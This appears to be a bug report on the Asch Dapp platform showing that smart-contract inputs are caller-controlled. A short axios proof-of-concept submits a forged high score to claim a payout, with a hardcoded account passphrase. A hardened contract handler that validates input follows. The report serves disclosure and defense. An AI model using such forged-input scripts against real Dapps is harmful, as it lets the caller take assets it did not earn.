Asch is an efficient, flexible, safe and decentralized application platform, which was initially designed to lower the barrier to entry for developers. The services provided by the Asch platform include a public chain and a set of application SDKs.
Since such requests are accepted from anywhere (see the links at the end of this issue), the input values for the (smart) contract of a Dapp can be manipulated by whoever sends the request.
For instance my contract winner.js may look like:

```js
module.exports = {
  winner: async function (score) {
    if (score > 100) {
      // pay the user some assets because his score is higher than 100
    }
  }
};
```
Now everyone can run the following script to get some assets and be a winner:

```js
const axios = require('axios');

var fee = '10000000';
var data = {
  secret: "acquire paper fun spice celery design able shrimp lunch angry alter gather",
  fee: fee,
  type: 1001, // the number for winner.winner
  args: 1000  // a very high score, chosen freely by the caller
};

axios.put('http://localhost:4096/api/dapps/ee0c22de321610bbc5698243d66f5122a20d2b1b1d534ee4f636165e1b6cd6f6/transactions/unsigned', data)
  .then(function (response) {
    console.log(response);
  })
  .catch(function (error) {
    console.log(error);
  })
  .then(function () {
    // always executed
  });
```
I believe that CORS can be useful for testing purposes, but it should be disabled for production (mainnet) at least.
As far as I understand, Dapps run on an express server with the cors middleware enabled, see also https://github.com/AschPlatform/asch/blob/master/src/init.js#L166.
As already described at https://github.com/bassjobsen/howto-asch-docs/blob/master/use-assets.md, and asked at https://stackoverflow.com/questions/51603087/how-to-guarantee-that-the-input-of-the-smart-contract-is-not-manipulated, PUT (same for POST, GET etc. too) requests to the Dapp from anywhere are allowed.
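The script above works because the contract pays out on whatever score the caller puts in `args`. The following is an added example, not Asch project code and not written against the Asch SDK, of a hardened `winner` handler that checks the shape of the argument and reads the score from state the chain itself recorded, so a caller-supplied number is never trusted; the `makeLedger`, `winner` and `attemptWithClaimedScore` names and the ledger layout are assumptions made for the example.

```javascript
const THRESHOLD = 100; // same payout rule as the original winner.js
const REWARD = 10;     // constructed payout amount (units are arbitrary here)

// Constructed ledger standing in for Dapp state: scores the chain recorded
// earlier (e.g. from move transactions) keyed "address:gameId", balances,
// and a record of claims already paid.
function makeLedger() {
  return {
    scores: new Map([['A1:g1', 42], ['A2:g1', 150]]),
    balances: new Map([['A1', 0], ['A2', 0]]),
    paid: new Set(),
  };
}

// The only thing the caller may choose is which game to claim for, and
// even that is checked for shape before it is used as a state key.
function parseGameId(args) {
  if (!Array.isArray(args) || args.length !== 1) {
    throw new Error('winner expects exactly one argument');
  }
  const gameId = args[0];
  if (typeof gameId !== 'string' || !/^[a-z0-9]{1,32}$/.test(gameId)) {
    throw new Error('invalid gameId');
  }
  return gameId;
}

// Hardened handler: the score comes from the ledger, never from args, and
// a claim is paid at most once per (sender, game).
function winner(ledger, sender, args) {
  const gameId = parseGameId(args);
  const key = `${sender}:${gameId}`;
  const score = ledger.scores.get(key);
  if (score === undefined) return { paid: false, reason: 'no recorded score' };
  if (score <= THRESHOLD) return { paid: false, reason: 'score too low' };
  if (ledger.paid.has(key)) return { paid: false, reason: 'already paid' };
  ledger.paid.add(key);
  ledger.balances.set(sender, (ledger.balances.get(sender) || 0) + REWARD);
  return { paid: true, amount: REWARD };
}

// Mirrors the request body in the script above (args: 1000, a bare number
// chosen by the caller); the hardened handler rejects it outright.
function attemptWithClaimedScore(ledger, sender, claimedArgs) {
  try {
    return winner(ledger, sender, claimedArgs);
  } catch (e) {
    return { paid: false, reason: e.message };
  }
}
```

Restricting CORS only affects browsers; a Node script like the one above is not subject to it, so the contract-side check is the control that actually stops a forged score.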